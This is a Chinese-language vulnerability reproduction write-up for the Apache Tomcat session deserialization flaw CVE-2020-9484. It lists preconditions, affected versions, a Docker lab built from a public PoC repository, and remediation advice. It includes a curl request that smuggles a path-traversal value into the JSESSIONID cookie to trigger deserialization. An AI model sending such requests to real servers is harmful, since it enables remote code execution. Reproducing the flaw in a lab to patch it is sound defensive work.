Apache Tomcat反序列化代码执行漏洞复现
前言
Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。
当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
漏洞分析
1、攻击者能够控制服务器上文件的内容和文件名称
2、服务器PersistenceManager配置中使用了FileStore
3、PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”,或者过滤器不够严格,导致允许攻击者提供反序列化数据的对象
4、攻击者知道使用的FileStore存储位置到攻击者可控文件的相对路径
影响版本
Apache Tomcat 10.0.0-M1—10.0.0-M4
Apache Tomcat 9.0.0.M1—9.0.34
Apache Tomcat 8.5.0—8.5.54
Apache Tomcat 7.0.0—7.0.103
环境搭建
$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ docker run -d -p 8080:8080 tomcat:groovy
http://yourip:8080即可打开网站
漏洞复现
参考https://github.com/masahiro331/CVE-2020-9484
curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'
修复建议
升级到 Apache Tomcat 10.0.0-M5 及以上版本
升级到 Apache Tomcat 9.0.35 及以上版本
升级到 Apache Tomcat 8.5.55 及以上版本
升级到 Apache Tomcat 7.0.104 及以上版本
临时修补建议:
禁止使用Session持久化功能FileStore。
内容来自:
安徽锋刃科技
[超站]友情链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
随时掌握互联网精彩
- 1 习近平引领网信事业高质量发展 4970531
- 2 中国人民解放军信息支援部队成立 4961900
- 3 伊朗总统发声未提及伊斯法罕爆炸 4862667
- 4 一季度农业农村经济“开门稳” 4741570
- 5 大熊猫吃笋整出了扛炮筒的架势 4627632
- 6 女孩被男同学开黄腔 妈妈巧妙处理 4503146
- 7 五一调休考虑过单休的人吗 4499523
- 8 重庆通报燃气费多计多收问题 4372950
- 9 广西白沙大道一大楼倒塌系谣言 4263408
- 10 五菱宏光回应被周鸿祎说空间小 4113584